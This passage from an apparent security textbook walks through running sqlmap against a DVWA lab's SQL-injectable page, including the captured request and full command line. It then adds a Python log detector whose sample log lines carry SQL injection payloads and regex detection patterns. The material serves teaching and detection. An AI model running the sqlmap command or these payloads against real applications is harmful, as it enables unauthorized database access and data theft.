Automation

There are tools that automate the detection and exploitation of SQL injection. For further review, we are going to show how to exploit the same vulnerability using sqlmap, a tool focused on SQL injection vulnerabilities.

First, we need to extract the request sent by the application to the server. Using an HTTP proxy, we get it:

    GET /dvwa/vulnerabilities/sqli/?id=cosa&Submit=Submit HTTP/1.1
    Host: 192.168.1.72
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: security=low; PHPSESSID=os91d50l1vbbipkvk7v0id7he2
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0

Now, we are going to launch sqlmap from a command line using the parameters in the request and the following command:

    sqlmap.py -u "http://192.168.1.72:80/dvwa/vulnerabilities/sqli/?id=cosa&Submit=Submit" --cookie="security=low;PHPSESSID=os91d50l1vbbipkvk7v0id7he2"

sqlmap is going to run a lot of tests to determine which parameters are vulnerable and exploit them if possible. It's all magic!

Finally, you can see the results, which are as follows:

Of course, sqlmap has more options to exploit in specific ways, but that is beyond the scope of this chapter; I recommend you read more about sqlmap at its website: http://sqlmap.org/.
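
Seen from the server side, the many tests sqlmap sends against the `id` parameter show up in the web server's access log. The following is an added example, not code from the book or from the sqlmap project: it flags clients by sqlmap's default User-Agent or by repeated SQL syntax in query parameters. The log lines, IP addresses, sqlmap version string and the threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

FIREFOX = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
SQLMAP = "sqlmap/1.2.11#stable (http://sqlmap.org)"  # constructed version string

def line(ip, value, ua):
    """Build one constructed Apache 'combined' log line for the DVWA page."""
    return (f'{ip} - - [10/Nov/2018:10:00:00 +0000] "GET /dvwa/vulnerabilities/sqli/'
            f'?id={value}&Submit=Submit HTTP/1.1" 200 4500 "-" "{ua}"')

# Constructed sample traffic: a normal user, a default sqlmap run, and a
# client sending SQL syntax behind a browser User-Agent.
SAMPLE_LOG = [
    line("192.168.1.10", "1", FIREFOX),
    line("192.168.1.10", "2", FIREFOX),
    line("192.168.1.50", "cosa", SQLMAP),
    line("192.168.1.50", "cosa%27%20AND%201%3D1--%20", SQLMAP),
    line("192.168.1.60", "cosa%27%20AND%201%3D1--%20", FIREFOX),
    line("192.168.1.60", "cosa%27%20UNION%20ALL%20SELECT%20NULL--%20", FIREFOX),
    line("192.168.1.60", "cosa%27%20AND%20SLEEP%285%29--%20", FIREFOX),
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
# Heuristic patterns for SQL syntax in a decoded parameter value.
SQLI_RE = re.compile(r"\bunion\b.+\bselect\b|\b(and|or)\b\s+\d+\s*=\s*\d+|\bsleep\s*\(", re.I)

def detect(lines, min_probes=3):
    """Return {client_ip: reason} for clients that look like automated SQLi testing."""
    probes = defaultdict(int)
    findings = {}
    for raw in lines:
        m = LOG_RE.match(raw)
        if not m:
            continue  # not a combined-format line
        ip, target, ua = m.groups()
        if ua.lower().startswith("sqlmap/"):
            findings[ip] = "sqlmap default User-Agent"
        # parse_qsl URL-decodes values, so %27%20AND%20... is matched as text.
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if SQLI_RE.search(value):
                probes[ip] += 1
    for ip, count in probes.items():
        if count >= min_probes:
            findings.setdefault(ip, f"{count} SQL-syntax parameter values")
    return findings

if __name__ == "__main__":
    for ip, reason in detect(SAMPLE_LOG).items():
        print(ip, reason)
```

The User-Agent check only matches the tool's default header, which is why the payload check runs independently of it; GET parameters appear in access logs, while POST bodies need application or WAF logging.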
